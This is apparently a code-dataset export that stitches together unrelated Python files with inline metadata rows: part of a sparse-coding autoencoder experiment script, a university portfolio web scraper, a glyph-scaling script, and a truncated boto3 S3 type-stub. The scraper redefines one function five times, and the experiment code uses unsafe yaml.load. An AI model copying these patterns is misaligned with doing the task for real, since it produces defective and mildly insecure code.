else:
crsae = TLAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["alpha"],
config_m["num_channels"],
)
################################################
# configure trainer
print("configure trainer.")
# trainer parameters
print_training_info(folder_name)
crsae.trainer.set_num_epochs(config_m["num_epochs"])
crsae.trainer.set_batch_size(config_m["batch_size"])
crsae.trainer.set_verbose(config_m["verbose"])
crsae.trainer.set_val_split(config_m["val_split"])
crsae.trainer.set_loss(config_m["loss"])
crsae.trainer.set_close(config_m["close"])
crsae.trainer.set_augment(config_m["augment"])
# optimizer
crsae.trainer.set_optimizer(config_m["optimizer"])
crsae.trainer.optimizer.set_lr(config_m["lr"])
if config_m["lambda_trainable"]:
crsae.trainer.optimizer.set_lambda_lr(config_m["lambda_lr"])
crsae.trainer.optimizer.set_amsgrad(config_m["amsgrad"])
# add callbacks
print("add callbacks.")
crsae.trainer.add_best_val_loss_callback(config_m["loss_type"])
crsae.trainer.add_all_epochs_callback(config_m["loss_type"])
crsae.trainer.add_earlystopping_callback(
config_m["min_delta"], config_m["patience"], config_m["loss_type"]
)
if config_m["cycleLR"]:
crsae.trainer.add_cyclic_lr_callback(
config_m["base_lr"], config_m["max_lr"], config_m["step_size"]
)
################################################
# load data
print("load data.")
hf = h5py.File("{}/experiments/{}/data/data.h5".format(PATH, folder_name), "r")
y_train_noisy = np.array(hf.get("y_train_noisy"))
y_test_noisy = np.array(hf.get("y_test_noisy"))
noiseSTD = np.array(hf.get("noiseSTD"))
print("noiseSTD:", noiseSTD)
################################################
# build model knowing noiseSTD
crsae.build_model(noiseSTD)
# initialize filter
if crsae.trainer.get_close():
H_true = np.load("{}/experiments/{}/data/H_true.npy".format(PATH, folder_name))
H_noisestd = 0.5 * np.std(np.squeeze(H_true), axis=0)
# H_noisestd = 0
print(H_noisestd)
crsae.set_H(H_true, H_noisestd)
################################################
# get lambda
print("lambda before training:", crsae.get_lambda())
################################################
# get initial H
H_init = crsae.get_H()
# get initial lambda
lambda_init = crsae.get_lambda()
################################################
# train
time = crsae.train_and_save(y_train_noisy, folder_name)
################################################
# # save results
# time = crsae.save_results(folder_name)
################################################
# get lambda
print("lambda after training:", crsae.get_lambda())
################################################
# predict
print("do prediciton.")
z_test_hat = crsae.encode(y_test_noisy)
###############################################
# save prediction
print("save prediction results.")
hf = h5py.File(
"{}/experiments/{}/results/TLAE_results_prediction_{}.h5".format(
PATH, folder_name, time
),
"w",
)
g_ch = hf.create_group("{}".format(config_d["ch"]))
g_ch.create_dataset(
"z_test_hat", data=z_test_hat, compression="gzip", compression_opts=9
)
g_ch.create_dataset("H_init", data=H_init)
g_ch.create_dataset("lambda_init", data=lambda_init)
hf.close()
@run_experiment.command()
@click.option("--folder_name", default="", help="folder name in experiment directory")
def simulated_fista_iteration_test(folder_name):
# load model parameters
print("load model parameters.")
file = open(
"{}/experiments/{}/config/config_model.yml".format(PATH, folder_name), "rb"
)
config_m = yaml.load(file)
file.close()
# load data parameters
print("load data parameters.")
file = open(
"{}/experiments/{}/config/config_data.yml".format(PATH, folder_name), "rb"
)
config_d = yaml.load(file)
file.close()
################################################
# create CRsAE object
print("create CRsAE object.")
print_model_info(folder_name)
if config_m["data_space"] == 1:
if config_m["lambda_trainable"]:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["delta"],
)
else:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
)
else:
if config_m["lambda_trainable"]:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["alpha"],
config_m["num_channels"],
config_m["delta"],
)
else:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["alpha"],
config_m["num_channels"],
)
################################################
# load data
print("load data.")
hf = h5py.File("{}/experiments/{}/data/data.h5".format(PATH, folder_name), "r")
y_test_noisy = np.array(hf.get("y_test_noisy"))
z_test = np.array(hf.get("z_test"))
noiseSTD = np.array(hf.get("noiseSTD"))
print("noiseSTD:", noiseSTD)
################################################
# build model knowing noiseSTD
crsae.build_model(noiseSTD)
H_true = np.load("{}/experiments/{}/data/H_true.npy".format(PATH, folder_name))
crsae.set_H(H_true, 0)
z_test_hat = crsae.encode(y_test_noisy)
best_permutation_index = 0
file_number = config_m["num_iterations"]
plot_code_sim(
8,
z_test,
z_test_hat,
best_permutation_index,
PATH,
folder_name,
file_number,
config_d["sampling_rate"],
row=1,
line_width=2,
marker_size=15,
scale=4,
scale_height=0.5,
text_font=45,
title_font=45,
axes_font=48,
legend_font=32,
number_font=40,
)
@run_experiment.command()
@click.option("--folder_name", default="", help="folder name in experiment directory")
def simulated_csc_speed(folder_name):
# load model parameters
print("load model parameters.")
file = open(
"{}/experiments/{}/config/config_model.yml".format(PATH, folder_name), "rb"
)
config_m = yaml.load(file)
file.close()
# load data parameters
print("load data parameters.")
file = open(
"{}/experiments/{}/config/config_data.yml".format(PATH, folder_name), "rb"
)
config_d = yaml.load(file)
file.close()
################################################
# create CRsAE object
print("create CRsAE object.")
print_model_info(folder_name)
if config_m["data_space"] == 1:
if config_m["lambda_trainable"]:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["delta"],
)
else:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
)
else:
if config_m["lambda_trainable"]:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["alpha"],
config_m["num_channels"],
config_m["delta"],
)
else:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["alpha"],
config_m["num_channels"],
)
################################################
# load data
print("load data.")
hf = h5py.File("{}/experiments/{}/data/data.h5".format(PATH, folder_name), "r")
y_train_noisy = np.array(hf.get("y_train_noisy"))
noiseSTD = np.array(hf.get("noiseSTD"))
print("noiseSTD:", noiseSTD)
################################################
# build model knowing noiseSTD
crsae.build_model(noiseSTD)
H_true = np.load("{}/experiments/{}/data/H_true.npy".format(PATH, folder_name))
crsae.set_H(H_true, 0)
z_train_hat = crsae.encode(y_train_noisy)
csc_times = []
for k in range(50):
csc_start_time = time.time()
z_train_hat = crsae.encode(y_train_noisy)
csc_times.append(time.time() - csc_start_time)
csc_time = np.mean(csc_times)
print(
"csc time: {} s for {} examples each {} length".format(
csc_time, y_train_noisy.shape[0], y_train_noisy.shape[1]
)
)
@run_experiment.command()
@click.option("--folder_name", default="", help="folder name in experiment directory")
def simulated_check_speed(folder_name):
# load model parameters
print("load model parameters.")
file = open(
"{}/experiments/{}/config/config_model.yml".format(PATH, folder_name), "rb"
)
config_m = yaml.load(file)
file.close()
# load data parameters
print("load data parameters.")
file = open(
"{}/experiments/{}/config/config_data.yml".format(PATH, folder_name), "rb"
)
config_d = yaml.load(file)
file.close()
################################################
# create CRsAE object
print("create CRsAE object.")
print_model_info(folder_name)
if config_m["data_space"] == 1:
if config_m["lambda_trainable"]:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["lambda_EM"],
config_m["delta"],
config_m["lambda_single"],
config_m["noiseSTD_lr"],
)
else:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["noiseSTD_lr"],
)
else:
if config_m["lambda_trainable"]:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["lambda_EM"],
config_m["delta"],
config_m["lambda_single"],
config_m["noiseSTD_lr"],
)
else:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["noiseSTD_lr"],
)
################################################
# configure trainer
print("configure trainer.")
# trainer parameters
print_training_info(folder_name)
crsae.trainer.set_num_epochs(config_m["num_epochs"])
crsae.trainer.set_batch_size(config_m["batch_size"])
crsae.trainer.set_verbose(config_m["verbose"])
crsae.trainer.set_val_split(config_m["val_split"])
crsae.trainer.set_loss(config_m["loss"])
crsae.trainer.set_close(config_m["close"])
crsae.trainer.set_augment(config_m["augment"])
# optimizer
crsae.trainer.set_optimizer(config_m["optimizer"])
crsae.trainer.optimizer.set_lr(config_m["lr"])
# ADAM
if config_m["optimizer"] == "Adam":
if "beta_1" in config_m:
crsae.trainer.optimizer.set_beta_1(config_m["beta_1"])
if "beta_2" in config_m:
crsae.trainer.optimizer.set_beta_2(config_m["beta_2"])
if "decay" in config_m:
crsae.trainer.optimizer.set_beta_2(config_m["decay"])
crsae.trainer.optimizer.set_amsgrad(config_m["amsgrad"])
# SGD
elif config_m["optimizer"] == "SGD":
if "momentum" in config_m:
crsae.trainer.optimizer.set_momentum(config_m["momentum"])
if "decay" in config_m:
crsae.trainer.optimizer.set_decay(config_m["decay"])
if "nesterov" in config_m:
crsae.trainer.optimizer.set_nesterov(config_m["nesterov"])
if config_m["lambda_trainable"]:
crsae.trainer.optimizer.set_lambda_lr(config_m["lambda_lr"])
# add callbacks
print("add callbacks.")
crsae.trainer.add_best_val_loss_callback(config_m["loss_type"])
crsae.trainer.add_all_epochs_callback(config_m["loss_type"])
crsae.trainer.add_earlystopping_callback(
config_m["min_delta"], config_m["patience"], config_m["loss_type"]
)
if config_m["cycleLR"]:
if config_m["cycle_mode"] == "exp_range":
crsae.trainer.add_cyclic_lr_callback(
config_m["base_lr"],
config_m["max_lr"],
config_m["step_size"],
config_m["cycle_mode"],
config_m["gamma"],
)
################################################
# load data
print("load data.")
hf = h5py.File("{}/experiments/{}/data/data.h5".format(PATH, folder_name), "r")
y_train_noisy = np.array(hf.get("y_train_noisy"))
y_test_noisy = np.array(hf.get("y_test_noisy"))
noiseSTD = np.array(hf.get("noiseSTD"))
print("noiseSTD:", noiseSTD)
################################################
# build model knowing noiseSTD
crsae.build_model(noiseSTD)
# initialize filter
if crsae.trainer.get_close():
H_true = np.load("{}/experiments/{}/data/H_true.npy".format(PATH, folder_name))
H_noisestd = 0.5 * np.std(np.squeeze(H_true), axis=0)
print(H_noisestd)
flag = 1
while flag:
crsae.set_H(H_true, H_noisestd)
dist_true_learned, temp = get_err_h1_h2(H_true, crsae.get_H())
if np.max(dist_true_learned) <= 0.5:
flag = 0
print("initial distance err:", dist_true_learned)
################################################
# train
time = crsae.check_speed(y_train_noisy)
print(time)
if __name__ == "__main__":
run_experiment()
| 37.311939 | 87 | 0.537779 | 6,052 | 54,065 | 4.477032 | 0.045935 | 0.151393 | 0.040967 | 0.029747 | 0.912751 | 0.903709 | 0.89201 | 0.881823 | 0.870899 | 0.863997 | 0 | 0.00525 | 0.281328 | 54,065 | 1,448 | 88 | 37.337707 | 0.692086 | 0.04206 | 0 | 0.790524 | 0 | 0 | 0.198901 | 0.029613 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007481 | false | 0.000831 | 0.014963 | 0 | 0.022444 | 0.088113 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c19acd7e9731b28ff09b3953aa08cec87ea4f8b8 | 4,090 | py | Python | source/department_portfolio.py | tajes-523342342/Bot | f6d200698a7b86bc23d2f64b90fc1fb2d5f74914 | [
"Apache-2.0"
] | 1 | 2020-05-24T01:08:53.000Z | 2020-05-24T01:08:53.000Z | source/department_portfolio.py | tajes-523342342/Bot | f6d200698a7b86bc23d2f64b90fc1fb2d5f74914 | [
"Apache-2.0"
] | null | null | null | source/department_portfolio.py | tajes-523342342/Bot | f6d200698a7b86bc23d2f64b90fc1fb2d5f74914 | [
"Apache-2.0"
] | 3 | 2020-05-21T08:39:07.000Z | 2020-09-30T19:45:53.000Z | import requests
from dateutil.parser import parse
from bs4 import BeautifulSoup
def portfolio():
url = "http://nith.ac.in/portfolios/"
page = requests.get(url)
soup = BeautifulSoup(page.content, 'html5lib')
table = soup.find_all('ul', {"class":"dropdown-menu"})
print("Enter \n 0)Architecture\n 1)Centre For Energy & Environmental\n 2)Material Science & Engineering\n 3)Chemical Engineering\n 4)Chemistry\n 5)Civil Engineering\n 6)Computer Science & Engineering\n 7)Electrical Engineering\n 8)Electronics & Communication Engineering\n 9)Humanities & Social Sciences\n 10)Mathematics & Scientific Computing\n 11)Mechanical Engineering \n 12)Physics & Photonics Science\n 13)Management Studies\n ")
t =int(input())
for element in table:
obj = {}
tds = element.findAll('li')
obj['link']=tds[t].contents[0]['href']
return obj['link']
def department_portfolio():
url = portfolio()
page = requests.get(url)
soup = BeautifulSoup(page.content, 'html5lib')
portfolio_arr = []
c=0
table = soup.find_all('div' , {"id":"home"})
f= table[0].find_all('table', {"class":"profilemain"})
for table in f:
c +=1
for i in range(0,c):
print("\n")
table = soup.find_all('table', )[i].tbody.findAll('tr')
for element in table :
obj = {}
tds=element.findAll('td')
obj=tds[0].text +" : "+ tds[2].text
# portfolio_arr.append()
portfolio_arr.append(obj)
def department_portfolio():
url = portfolio()
page = requests.get(url)
soup = BeautifulSoup(page.content, 'html5lib')
portfolio_arr = []
c=0
table = soup.find_all('div' , {"id":"home"})
f= table[0].find_all('table', {"class":"profilemain"})
for table in f:
c +=1
for i in range(0,c):
print("\n")
table = soup.find_all('table', )[i].tbody.findAll('tr')
for element in table :
obj = {}
tds=element.findAll('td')
obj=tds[0].text +" : "+ tds[2].text
# portfolio_arr.append()
portfolio_arr.append(obj)
def department_portfolio():
url = portfolio()
page = requests.get(url)
soup = BeautifulSoup(page.content, 'html5lib')
portfolio_arr = []
c=0
table = soup.find_all('div' , {"id":"home"})
f= table[0].find_all('table', {"class":"profilemain"})
for table in f:
c +=1
for i in range(0,c):
print("\n")
table = soup.find_all('table', )[i].tbody.findAll('tr')
for element in table :
obj = {}
tds=element.findAll('td')
obj=tds[0].text +" : "+ tds[2].text
# portfolio_arr.append()
portfolio_arr.append(obj)
def department_portfolio():
url = portfolio()
page = requests.get(url)
soup = BeautifulSoup(page.content, 'html5lib')
portfolio_arr = []
c=0
table = soup.find_all('div' , {"id":"home"})
f= table[0].find_all('table', {"class":"profilemain"})
for table in f:
c +=1
for i in range(0,c):
print("\n")
table = soup.find_all('table', )[i].tbody.findAll('tr')
for element in table :
obj = {}
tds=element.findAll('td')
obj=tds[0].text +" : "+ tds[2].text
# portfolio_arr.append()
portfolio_arr.append(obj)
def department_portfolio():
url = portfolio()
page = requests.get(url)
soup = BeautifulSoup(page.content, 'html5lib')
portfolio_arr = []
c=0
table = soup.find_all('div' , {"id":"home"})
f= table[0].find_all('table', {"class":"profilemain"})
for table in f:
c +=1
for i in range(0,c):
print("\n")
table = soup.find_all('table', )[i].tbody.findAll('tr')
for element in table :
obj = {}
tds=element.findAll('td')
obj=tds[0].text +" : "+ tds[2].text
# portfolio_arr.append()
portfolio_arr.append(obj)
return portfolio_arr
| 35.258621 | 439 | 0.567237 | 521 | 4,090 | 4.381958 | 0.1881 | 0.049058 | 0.062637 | 0.077092 | 0.756023 | 0.756023 | 0.756023 | 0.756023 | 0.739816 | 0.716163 | 0 | 0.018868 | 0.274328 | 4,090 | 115 | 440 | 35.565217 | 0.750337 | 0 | 0 | 0.886792 | 0 | 0.009434 | 0.196364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.028302 | null | null | 0.056604 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c19c821351aa39b4e72a02f68cb2361b21aed408 | 177 | py | Python | hTools2.roboFontExt/lib/Scripts/selected glyphs/transform/scale.py | frankrolf/hTools2_extension | 9d73b8640c85209853a72f8d4b167768de5e0d60 | [
"BSD-3-Clause"
] | 2 | 2019-12-18T16:12:07.000Z | 2019-12-21T01:19:23.000Z | hTools2.roboFontExt/lib/Scripts/selected glyphs/transform/scale.py | frankrolf/hTools2_extension | 9d73b8640c85209853a72f8d4b167768de5e0d60 | [
"BSD-3-Clause"
] | null | null | null | hTools2.roboFontExt/lib/Scripts/selected glyphs/transform/scale.py | frankrolf/hTools2_extension | 9d73b8640c85209853a72f8d4b167768de5e0d60 | [
"BSD-3-Clause"
] | null | null | null | # [h] scale glyphs dialog
import hTools2.dialogs.glyphs.scale
import importlib
importlib.reload(hTools2.dialogs.glyphs.scale)
hTools2.dialogs.glyphs.scale.scaleGlyphsDialog()
| 22.125 | 48 | 0.824859 | 22 | 177 | 6.636364 | 0.454545 | 0.287671 | 0.410959 | 0.513699 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018293 | 0.073446 | 177 | 7 | 49 | 25.285714 | 0.871951 | 0.129944 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
a9af4b6eec927e83102ef1db1636b7e4de88625d | 15,690 | py | Python | boto3_type_annotations/boto3_type_annotations/s3/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 119 | 2018-12-01T18:20:57.000Z | 2022-02-02T10:31:29.000Z | boto3_type_annotations/boto3_type_annotations/s3/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 15 | 2018-11-16T00:16:44.000Z | 2021-11-13T03:44:18.000Z | boto3_type_annotations/boto3_type_annotations/s3/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 11 | 2019-05-06T05:26:51.000Z | 2021-09-28T15:27:59.000Z | from botocore.client import BaseClient
from typing import Callable
from typing import List
from typing import Optional
from typing import Dict
from boto3.s3.transfer import TransferConfig
from typing import Union
from botocore.paginate import Paginator
from datetime import datetime
from botocore.waiter import Waiter
from typing import IO
class Client(BaseClient):
def abort_multipart_upload(self, Bucket: str, Key: str, UploadId: str, RequestPayer: str = None) -> Dict:
pass
def can_paginate(self, operation_name: str = None):
pass
def complete_multipart_upload(self, Bucket: str, Key: str, UploadId: str, MultipartUpload: Dict = None, RequestPayer: str = None) -> Dict:
pass
def copy(self, CopySource: Dict = None, Bucket: str = None, Key: str = None, ExtraArgs: Dict = None, Callback: Callable = None, SourceClient: BaseClient = None, Config: TransferConfig = None):
pass
def copy_object(self, Bucket: str, CopySource: Union[str, Dict], Key: str, ACL: str = None, CacheControl: str = None, ContentDisposition: str = None, ContentEncoding: str = None, ContentLanguage: str = None, ContentType: str = None, CopySourceIfMatch: str = None, CopySourceIfModifiedSince: datetime = None, CopySourceIfNoneMatch: str = None, CopySourceIfUnmodifiedSince: datetime = None, Expires: datetime = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWriteACP: str = None, Metadata: Dict = None, MetadataDirective: str = None, TaggingDirective: str = None, ServerSideEncryption: str = None, StorageClass: str = None, WebsiteRedirectLocation: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, SSEKMSKeyId: str = None, CopySourceSSECustomerAlgorithm: str = None, CopySourceSSECustomerKey: str = None, CopySourceSSECustomerKeyMD5: str = None, RequestPayer: str = None, Tagging: str = None, ObjectLockMode: str = None, ObjectLockRetainUntilDate: datetime = None, ObjectLockLegalHoldStatus: str = None) -> Dict:
pass
def create_bucket(self, Bucket: str, ACL: str = None, CreateBucketConfiguration: Dict = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWrite: str = None, GrantWriteACP: str = None, ObjectLockEnabledForBucket: bool = None) -> Dict:
pass
def create_multipart_upload(self, Bucket: str, Key: str, ACL: str = None, CacheControl: str = None, ContentDisposition: str = None, ContentEncoding: str = None, ContentLanguage: str = None, ContentType: str = None, Expires: datetime = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWriteACP: str = None, Metadata: Dict = None, ServerSideEncryption: str = None, StorageClass: str = None, WebsiteRedirectLocation: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, SSEKMSKeyId: str = None, RequestPayer: str = None, Tagging: str = None, ObjectLockMode: str = None, ObjectLockRetainUntilDate: datetime = None, ObjectLockLegalHoldStatus: str = None) -> Dict:
pass
def delete_bucket(self, Bucket: str):
pass
def delete_bucket_analytics_configuration(self, Bucket: str, Id: str):
pass
def delete_bucket_cors(self, Bucket: str):
pass
def delete_bucket_encryption(self, Bucket: str):
pass
def delete_bucket_inventory_configuration(self, Bucket: str, Id: str):
pass
def delete_bucket_lifecycle(self, Bucket: str):
pass
def delete_bucket_metrics_configuration(self, Bucket: str, Id: str):
pass
def delete_bucket_policy(self, Bucket: str):
pass
def delete_bucket_replication(self, Bucket: str):
pass
def delete_bucket_tagging(self, Bucket: str):
pass
def delete_bucket_website(self, Bucket: str):
pass
def delete_object(self, Bucket: str, Key: str, MFA: str = None, VersionId: str = None, RequestPayer: str = None, BypassGovernanceRetention: bool = None) -> Dict:
pass
def delete_object_tagging(self, Bucket: str, Key: str, VersionId: str = None) -> Dict:
pass
def delete_objects(self, Bucket: str, Delete: Dict, MFA: str = None, RequestPayer: str = None, BypassGovernanceRetention: bool = None) -> Dict:
pass
def delete_public_access_block(self, Bucket: str):
pass
def download_file(self, Bucket: str = None, Key: str = None, Filename: str = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def download_fileobj(self, Fileobj: IO = None, Bucket: str = None, Key: str = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def generate_presigned_post(self, Bucket: str = None, Key: str = None, Fields: Dict = None, Conditions: List = None, ExpiresIn: int = None) -> Dict:
pass
def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):
pass
def get_bucket_accelerate_configuration(self, Bucket: str) -> Dict:
pass
def get_bucket_acl(self, Bucket: str) -> Dict:
pass
def get_bucket_analytics_configuration(self, Bucket: str, Id: str) -> Dict:
pass
def get_bucket_cors(self, Bucket: str) -> Dict:
pass
def get_bucket_encryption(self, Bucket: str) -> Dict:
pass
def get_bucket_inventory_configuration(self, Bucket: str, Id: str) -> Dict:
pass
def get_bucket_lifecycle(self, Bucket: str) -> Dict:
pass
def get_bucket_lifecycle_configuration(self, Bucket: str) -> Dict:
pass
def get_bucket_location(self, Bucket: str) -> Dict:
pass
def get_bucket_logging(self, Bucket: str) -> Dict:
pass
def get_bucket_metrics_configuration(self, Bucket: str, Id: str) -> Dict:
pass
def get_bucket_notification(self, Bucket: str) -> Dict:
pass
def get_bucket_notification_configuration(self, Bucket: str) -> Dict:
pass
def get_bucket_policy(self, Bucket: str) -> Dict:
pass
def get_bucket_policy_status(self, Bucket: str) -> Dict:
pass
def get_bucket_replication(self, Bucket: str) -> Dict:
pass
def get_bucket_request_payment(self, Bucket: str) -> Dict:
pass
def get_bucket_tagging(self, Bucket: str) -> Dict:
pass
def get_bucket_versioning(self, Bucket: str) -> Dict:
pass
def get_bucket_website(self, Bucket: str) -> Dict:
pass
def get_object(self, Bucket: str, Key: str, IfMatch: str = None, IfModifiedSince: datetime = None, IfNoneMatch: str = None, IfUnmodifiedSince: datetime = None, Range: str = None, ResponseCacheControl: str = None, ResponseContentDisposition: str = None, ResponseContentEncoding: str = None, ResponseContentLanguage: str = None, ResponseContentType: str = None, ResponseExpires: datetime = None, VersionId: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None, PartNumber: int = None) -> Dict:
pass
def get_object_acl(self, Bucket: str, Key: str, VersionId: str = None, RequestPayer: str = None) -> Dict:
pass
def get_object_legal_hold(self, Bucket: str, Key: str, VersionId: str = None, RequestPayer: str = None) -> Dict:
pass
def get_object_lock_configuration(self, Bucket: str) -> Dict:
pass
def get_object_retention(self, Bucket: str, Key: str, VersionId: str = None, RequestPayer: str = None) -> Dict:
pass
def get_object_tagging(self, Bucket: str, Key: str, VersionId: str = None) -> Dict:
pass
def get_object_torrent(self, Bucket: str, Key: str, RequestPayer: str = None) -> Dict:
pass
def get_paginator(self, operation_name: str = None) -> Paginator:
pass
def get_public_access_block(self, Bucket: str) -> Dict:
pass
def get_waiter(self, waiter_name: str = None) -> Waiter:
pass
def head_bucket(self, Bucket: str):
pass
def head_object(self, Bucket: str, Key: str, IfMatch: str = None, IfModifiedSince: datetime = None, IfNoneMatch: str = None, IfUnmodifiedSince: datetime = None, Range: str = None, VersionId: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None, PartNumber: int = None) -> Dict:
pass
def list_bucket_analytics_configurations(self, Bucket: str, ContinuationToken: str = None) -> Dict:
pass
def list_bucket_inventory_configurations(self, Bucket: str, ContinuationToken: str = None) -> Dict:
pass
def list_bucket_metrics_configurations(self, Bucket: str, ContinuationToken: str = None) -> Dict:
pass
def list_buckets(self) -> Dict:
pass
def list_multipart_uploads(self, Bucket: str, Delimiter: str = None, EncodingType: str = None, KeyMarker: str = None, MaxUploads: int = None, Prefix: str = None, UploadIdMarker: str = None) -> Dict:
pass
def list_object_versions(self, Bucket: str, Delimiter: str = None, EncodingType: str = None, KeyMarker: str = None, MaxKeys: int = None, Prefix: str = None, VersionIdMarker: str = None) -> Dict:
pass
def list_objects(self, Bucket: str, Delimiter: str = None, EncodingType: str = None, Marker: str = None, MaxKeys: int = None, Prefix: str = None, RequestPayer: str = None) -> Dict:
pass
def list_objects_v2(self, Bucket: str, Delimiter: str = None, EncodingType: str = None, MaxKeys: int = None, Prefix: str = None, ContinuationToken: str = None, FetchOwner: bool = None, StartAfter: str = None, RequestPayer: str = None) -> Dict:
pass
def list_parts(self, Bucket: str, Key: str, UploadId: str, MaxParts: int = None, PartNumberMarker: int = None, RequestPayer: str = None) -> Dict:
pass
def put_bucket_accelerate_configuration(self, Bucket: str, AccelerateConfiguration: Dict):
pass
def put_bucket_acl(self, Bucket: str, ACL: str = None, AccessControlPolicy: Dict = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWrite: str = None, GrantWriteACP: str = None):
pass
def put_bucket_analytics_configuration(self, Bucket: str, Id: str, AnalyticsConfiguration: Dict):
pass
def put_bucket_cors(self, Bucket: str, CORSConfiguration: Dict):
pass
def put_bucket_encryption(self, Bucket: str, ServerSideEncryptionConfiguration: Dict, ContentMD5: str = None):
pass
def put_bucket_inventory_configuration(self, Bucket: str, Id: str, InventoryConfiguration: Dict):
pass
def put_bucket_lifecycle(self, Bucket: str, LifecycleConfiguration: Dict = None):
pass
def put_bucket_lifecycle_configuration(self, Bucket: str, LifecycleConfiguration: Dict = None):
pass
def put_bucket_logging(self, Bucket: str, BucketLoggingStatus: Dict):
pass
def put_bucket_metrics_configuration(self, Bucket: str, Id: str, MetricsConfiguration: Dict):
pass
def put_bucket_notification(self, Bucket: str, NotificationConfiguration: Dict):
pass
def put_bucket_notification_configuration(self, Bucket: str, NotificationConfiguration: Dict):
pass
def put_bucket_policy(self, Bucket: str, Policy: str, ConfirmRemoveSelfBucketAccess: bool = None):
pass
def put_bucket_replication(self, Bucket: str, ReplicationConfiguration: Dict):
pass
def put_bucket_request_payment(self, Bucket: str, RequestPaymentConfiguration: Dict):
pass
def put_bucket_tagging(self, Bucket: str, Tagging: Dict):
pass
def put_bucket_versioning(self, Bucket: str, VersioningConfiguration: Dict, MFA: str = None):
